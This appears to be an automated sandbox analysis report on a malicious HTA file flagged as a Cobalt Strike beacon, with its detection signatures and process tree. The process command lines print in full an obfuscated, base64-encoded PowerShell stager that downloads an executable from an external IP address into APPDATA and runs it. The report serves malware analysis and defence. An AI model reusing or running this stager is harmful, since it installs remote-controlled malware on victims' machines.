Windows
Analysis Report
sdf.hta
Overview
General Information
Detection
Cobalt Strike
Score: | 92 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Detected Cobalt Strike Beacon
Multi AV Scanner detection for submitted file
Yara detected Powershell decode and execute
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
mshta.exe (PID: 7400 cmdline:
mshta.exe "C:\Users\ user\Deskt op\sdf.hta " MD5: 06B02D5C097C7DB1F109749C45F3F505) cmd.exe (PID: 7500 cmdline:
"C:\Window s\system32 \cmd.exe" "/c PowErs hELL -Ex byPaSS -Nop -w 1 -c DeViCecre dENTialDEp loyMEnT.ex e ; iEx( $(iex('[sy STem.texT. enCODing]' +[chaR]0X3 a+[CHar]58 +'utf8.gET STRING([SY Stem.conVE RT]'+[char ]58+[cHar] 0X3a+'FRoM baSE64StRi Ng('+[chAr ]0x22+'JFB uQUJlcDB6I CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgID0gICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gQWRELVR5U GUgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLW1 FTWJlcmRFZ klOSVRpb04 gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgJ1tEb GxJbXBvcnQ oInVSbE1PT i5ETGwiLCA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBDaGFyU 2V0ID0gQ2h hclNldC5Vb mljb2RlKV1 wdWJsaWMgc 3RhdGljIGV 4dGVybiBJb nRQdHIgVVJ MRG93bmxvY WRUb0ZpbGU oSW50UHRyI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIG1xaHl wVndHVGVvL HN0cmluZyA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBKWGdLL HN0cmluZyA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBXb2osd WludCAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB 0ZnV1a1osS W50UHRyICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIFFUdUdOK TsnICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIC1 OYW1lICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CJ0SlZneEF 5S28iICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI C1OYU1lc3B BY2UgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgQ kh0WSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA tUGFzc1Roc nU7ICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICR QbkFCZXAwe jo6VVJMRG9 3bmxvYWRUb 0ZpbGUoMCw iaHR0cDovL zE3Mi4yNDU uMTkxLjg4L zYyMC9jc3J zcy5leGUiL CIkZU52OkF QUERBVEFcY 3Nyc3MuZXh lIiwwLDApO 3N0QVJULXN sZWVQKDMpO 0luVm9LZS1 pVGVNICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CIkZU5WOkF QUERBVEFcY 3Nyc3MuZXh lIg=='+[ch aR]0x22+') )')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 7508 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7552 cmdline:
PowErshELL -E x by PaSS -Nop -w 1 - c De ViCecredEN TialDEploy MEnT.exe ; iEx($(i ex('[sySTe m.texT.enC ODing]'+[c haR]0X3a+[ CHar]58+'u tf8.gETSTR ING([SYSte m.conVERT] '+[char]58 +[cHar]0X3 a+'FRoMbaS E64StRiNg( '+[chAr]0x 22+'JFBuQU JlcDB6ICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ID0gICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgQW RELVR5UGUg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgLW1FTW JlcmRFZklO SVRpb04gIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgJ1tEbGxJ bXBvcnQoIn VSbE1PTi5E TGwiLCAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC BDaGFyU2V0 ID0gQ2hhcl NldC5Vbmlj b2RlKV1wdW JsaWMgc3Rh dGljIGV4dG VybiBJbnRQ dHIgVVJMRG 93bmxvYWRU b0ZpbGUoSW 50UHRyICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IG1xaHlwVn dHVGVvLHN0 cmluZyAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC BKWGdLLHN0 cmluZyAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC BXb2osdWlu dCAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICB0Zn V1a1osSW50 UHRyICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIF FUdUdOKTsn ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1OYW 1lICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICJ0 SlZneEF5S2 8iICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIC1O YU1lc3BBY2 UgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgQkh0 WSAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAtUG Fzc1RocnU7 ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICRQbk FCZXAwejo6 VVJMRG93bm xvYWRUb0Zp bGUoMCwiaH R0cDovLzE3 Mi4yNDUuMT kxLjg4LzYy MC9jc3Jzcy 5leGUiLCIk ZU52OkFQUE RBVEFcY3Ny c3MuZXhlIi wwLDApO3N0 QVJULXNsZW VQKDMpO0lu Vm9LZS1pVG VNICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICIk ZU5WOkFQUE RBVEFcY3Ny c3MuZXhlIg =='+[chaR] 0x22+'))') ))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) csc.exe (PID: 7688 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\l1pl2equ \l1pl2equ. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) cvtres.exe (PID: 7772 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE SFA6B.tmp" "c:\Users \user\AppD ata\Local\ Temp\l1pl2 equ\CSC883 B0A053CD34 D78B131B17 7ADC31BC6. TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
svchost.exe (PID: 7732 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Michael Haag: |